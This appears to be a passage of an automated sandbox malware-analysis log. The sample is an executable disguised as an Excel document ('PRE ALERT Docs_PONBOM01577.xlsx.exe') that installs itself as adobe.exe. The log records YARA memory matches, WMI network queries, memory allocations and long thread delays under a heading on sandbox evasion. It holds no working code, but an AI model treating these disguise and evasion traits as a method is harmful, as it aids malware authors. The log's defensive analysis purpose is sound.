                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: PRE ALERT Docs_PONBOM01577.xlsx.exe PID: 4464, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 7444, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 7776, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeMemory allocated: 1320000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeMemory allocated: 2DC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeMemory allocated: 4DC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeMemory allocated: 7D40000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeMemory allocated: 8D40000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeMemory allocated: 8EF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeMemory allocated: 9EF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeMemory allocated: A260000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeMemory allocated: B260000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeMemory allocated: C260000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeMemory allocated: D270000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeMemory allocated: E270000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeMemory allocated: F270000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeMemory allocated: F930000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeMemory allocated: 2B60000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeMemory allocated: 2DB0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeMemory allocated: 2B60000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 1490000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 2E30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 4E30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 73D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 83D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 8560000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 9560000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 9880000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: A880000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 8560000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 9880000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: A880000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 1060000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 2E40000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 10A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 1250000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 2C80000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 2B00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 7310000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 6FE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 8310000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 9310000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 9620000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: A620000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: B620000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: C7F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: D7F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: E7F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: EE10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: E10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 2C40000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 2AB0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 599890Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 599781Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 599671Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 599562Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 599453Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 599343Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 599234Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 599124Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 599015Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 598906Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 598796Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 598687Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 598578Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 598468Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 598357Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 598234Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 598124Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 598015Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 597906Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 597796Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 597687Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 597482Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 597369Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 597242Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 597122Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 597015Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 596906Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 596796Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 596687Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 596577Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 596468Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 596359Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 596249Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 596139Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 596022Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 595921Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 595812Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 595700Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 595593Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 595484Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 595374Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 595264Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 595156Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 595046Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 594934Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 594823Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 594718Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 594609Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 594500Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 594390Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599890Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599671Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599562Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599343Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599120Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599015Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598906Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598796Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598687Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598578Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598463Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598356Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598250Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598029Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597918Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597812Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597703Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597593Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597484Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597374Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597265Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597156Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597044Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596937Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596828Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596718Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596609Jump to behavior
